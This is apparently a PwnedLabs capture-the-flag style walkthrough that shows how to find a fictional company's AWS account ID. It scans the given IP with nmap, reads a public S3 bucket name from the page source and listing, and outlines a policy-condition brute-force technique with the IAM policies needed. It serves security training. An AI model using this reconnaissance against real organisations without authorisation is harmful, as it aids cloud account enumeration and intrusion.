Medium
Page cover

PWNEDLABS

PWNEDLABS offers hands-on challenges focused on cloud security, covering AWS, Azure, and other platforms. Improve your exploitation skills with real-world scenarios.

Identify the AWS Account ID from a Public S3 Bucket

Scenario

The ability to expose and leverage even the smallest oversights is a coveted skill. A global Logistics Company has reached out to our cybersecurity company for assistance and have provided the IP address of their website. Your objective? Start the engagement and use this IP address to identify their AWS account ID via a public S3 bucket so we can commence the process of enumeration.

Lab prerequisites

  • Basic Linux command line knowledge

Learning outcomes

  • Knowledge of a technique that can be used to find AWS Account IDs

  • Understanding what a tool does by performing a code review

Difficulty

Foundations

Focus

Red

Real-world context

If threat actors get their hands on an AWS Account ID, they can try to identify the IAM roles and users tied to that account. They can do this by taking advantage of detailed error messages that AWS services return when inputting an incorrect username or role name. These messages can verify if an IAM user or role exists, which can help threat actors compile a list of possible targets in the AWS account. It's also possible to filter public EBS and RDS snapshots by the AWS Account ID that owns it.

Walkthrough

Enumeration

Let's start by scanning the IP address with Nmap. Port 80 & 53 is available we can check it out in a browser.

Nmap Result
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -A 54.204.171.32 -T4       
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-16 18:28 EST
Nmap scan report for ec2-54-204-171-32.compute-1.amazonaws.com (54.204.171.32)
Host is up (0.083s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
53/tcp open  domain  ISC BIND 9.16.23 (RedHat Linux)
| dns-nsid: 
|_  bind.version: 9.16.23-RH
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Mega Big Tech
|_http-server-header: Apache/2.4.52 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router|storage-misc
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X|5.X (87%), MikroTik RouterOS 7.X (85%), Synology DiskStation Manager 5.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 2.6.32 (87%), Linux 2.6.32 - 3.13 (87%), Linux 3.10 - 4.11 (87%), Linux 3.2 - 4.14 (87%), Linux 3.4 - 3.10 (87%), Linux 4.15 - 5.19 (87%), Linux 5.0 - 5.14 (87%), Linux 5.1 - 5.15 (87%), Linux 2.6.32 - 3.10 (86%), Linux 2.6.39 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 25 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   2.14 ms   192.168.0.1
2   4.82 ms   10.14.161.1
3   3.32 ms   150.129.109.73
4   3.73 ms   10.241.1.6
5   5.77 ms   10.240.254.53
6   ... 7
8   6.36 ms   10.240.246.1
9   5.23 ms   10.200.22.1
10  63.77 ms  static-65.115.194.14-tataidc.co.in (14.194.115.65)
11  4.10 ms   10.124.248.81
12  13.20 ms  115.113.172.125.static-kolkata.vsnl.net.in (115.113.172.125)
13  37.84 ms  172.23.183.134
14  39.51 ms  ix-ae-0-100.tcore1.mlv-mumbai.as6453.net (180.87.38.5)
15  257.41 ms if-be-13-2.ecore1.mlv-mumbai.as6453.net (180.87.38.29)
16  260.83 ms if-be-47-2.ecore1.emrs2-marseille.as6453.net (80.231.217.52)
17  ...
18  269.00 ms 63.243.137.148
19  ... 24
25  251.01 ms ec2-54-204-171-32.compute-1.amazonaws.com (54.204.171.32)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.79 seconds

This reveals the website for the company Mega Big Tech. There doesn't seem to be any interesting functionality, let's check the source code.

Mega Big Tech

The reveals that the images are being hosted on an Amazon S3 bucket named mega-big-tech.

<section class="product-mac">
    <div class="container">
      <h2>WorkPro</h2>
      <div class="grid">
        <div class="grid-product">
          <img src="https://mega-big-tech.s3.amazonaws.com/images/workpro1.jpg">
          <div class="grid-detail">
            <p>WorkPro</p>
            <p>From $5,000</p>
          </div>
        </div>

Inspection of this bucket in the browser reveals an images directory with other images, but nothing too interesting.

<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Name>mega-big-tech</Name><Prefix></Prefix><Marker></Marker><MaxKeys>1000</MaxKeys><IsTruncated>false</IsTruncated><Contents><Key>images/</Key><LastModified>2023-06-25T22:40:57.000Z</LastModified><ETag>&quot;d41d8cd98f00b204e9800998ecf8427e&quot;</ETag><Size>0</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/banner.jpg</Key><LastModified>2023-06-25T22:42:34.000Z</LastModified><ETag>&quot;3ad5c014c01ffeb0743182379d2cd80d&quot;</ETag><Size>3184176</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/notepro1.jpg</Key><LastModified>2023-06-25T22:42:35.000Z</LastModified><ETag>&quot;f5435f26a11fac38006d8fe32ed75045&quot;</ETag><Size>941294</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/notepro2.jpg</Key><LastModified>2023-06-25T22:42:36.000Z</LastModified><ETag>&quot;c7b217afa365714334597643889c5daa&quot;</ETag><Size>1660205</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/notepro3.jpg</Key><LastModified>2023-06-25T22:42:37.000Z</LastModified><ETag>&quot;11acc403ec7efabdf2743404e1fc6be7&quot;</ETag><Size>490794</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/notepro4.jpg</Key><LastModified>2023-06-25T22:42:38.000Z</LastModified><ETag>&quot;2ba1a84a0908e91bec8d05981c28fc40&quot;</ETag><Size>2415092</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/phonepro1.jpg</Key><LastModified>2023-06-25T22:42:39.000Z</LastModified><ETag>&quot;8b2541f6138dd34e392f45fc6ab8ba6f&quot;</ETag><Size>1003564</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/phonepro2.jpg</Key><LastModified>2023-06-25T22:42:40.000Z</LastModified><ETag>&quot;f9bf19e16a9a31a6754d7c55d0576ec4&quot;</ETag><Size>1277058</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/phonepro3.jpg</Key><LastModified>2023-06-25T22:42:41.000Z</LastModified><ETag>&quot;c5e3b974eb2a8cc3cb6cd7f14a358419&quot;</ETag><Size>2322525</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/phonepro4.jpg</Key><LastModified>2023-06-25T22:42:42.000Z</LastModified><ETag>&quot;e77b77f088be31b907562c1c08d3c1ea&quot;</ETag><Size>4080373</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/watchpro1.jpg</Key><LastModified>2023-06-25T22:42:43.000Z</LastModified><ETag>&quot;8c6b69baa95f5a7ed0f9d2e1dae73160&quot;</ETag><Size>1160096</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/watchpro2.jpg</Key><LastModified>2023-06-25T22:42:44.000Z</LastModified><ETag>&quot;ab66d316fbdfa90eea53e89855dc243f&quot;</ETag><Size>2877784</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/watchpro3.jpg</Key><LastModified>2023-06-25T22:42:46.000Z</LastModified><ETag>&quot;a105349b350b257b05438dbc1c8fbe4d&quot;</ETag><Size>3232387</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/watchpro4.jpg</Key><LastModified>2023-06-25T22:42:47.000Z</LastModified><ETag>&quot;f5315cb77b5de5a74c13417e185d3953&quot;</ETag><Size>3041540</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/watchpro5.jpg</Key><LastModified>2023-06-25T22:42:49.000Z</LastModified><ETag>&quot;f137be90eec86dd71da37f25bdc5452e&quot;</ETag><Size>3400957</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/workpro1.jpg</Key><LastModified>2023-06-25T22:42:50.000Z</LastModified><ETag>&quot;ee9140f394608d8ed638c9b39b9c1c4f&quot;</ETag><Size>1632585</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/workpro2.jpg</Key><LastModified>2023-06-25T22:42:51.000Z</LastModified><ETag>&quot;fd33607a6406f4a6cb1550cba96ea200&quot;</ETag><Size>1081259</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/workpro3.jpg</Key><LastModified>2023-06-25T22:42:54.000Z</LastModified><ETag>&quot;78fec3d6d2c81294346fa618ba0caf00&quot;</ETag><Size>1599810</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>images/workpro4.jpg</Key><LastModified>2023-06-25T22:42:56.000Z</LastModified><ETag>&quot;9a70d62b2f2bd2bf6604943bde09f6bd&quot;</ETag><Size>1144134</Size><StorageClass>STANDARD</StorageClass></Contents></ListBucketResult>

With the S3 bucket name we can attempt to get the ID of the AWS Account it's hosted in. Research by Ben Bridts revealed that it's possible to quickly brute force the AWS account ID an S3 bucket belongs to. Reading this research post and also reviewing the code here is recommended, but a TL; DR is that this script creates policy that utilizes the new S3:ResourceAccount Policy Condition Key to evaluate whether to grant us access to an S3 bucket based on the AWS account that the bucket belongs to. Fortunately, the script doesn't have to guess a trillion different account IDs to find the right one, the available search space is massively reduced by leveraging string matching and wildcards. Each correctly matched digit is appended to a variable, and the request is repeated until the account ID is found.

We have provided a user with a role it can assume in order to carry out this attack, if you do not have access to an AWS account. However, if you would like to set up the user and role yourself, you can create the policies below.

The IAM user assuming the role would have the following policy attached.

{
    "Version": "2012-10-17",
    "Statement": {
        "Effect": "Allow",
        "Action": "sts:AssumeRole",
        "Resource": "arn:aws:iam::<your aws account id>:role/<your role name>"
    }
}

The role that your user is allowed to assume would have the following policy attached that allows the s3:GetObject and s3:ListBucket permissions to the mega-big-tech bucket.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "Enum",
            "Effect": "Allow",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::mega-big-tech/*"
        },
        {
            "Sid": "Enum1",
            "Effect": "Allow",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::mega-big-tech"
        }
    ]
}

Last updated

Was this helpful?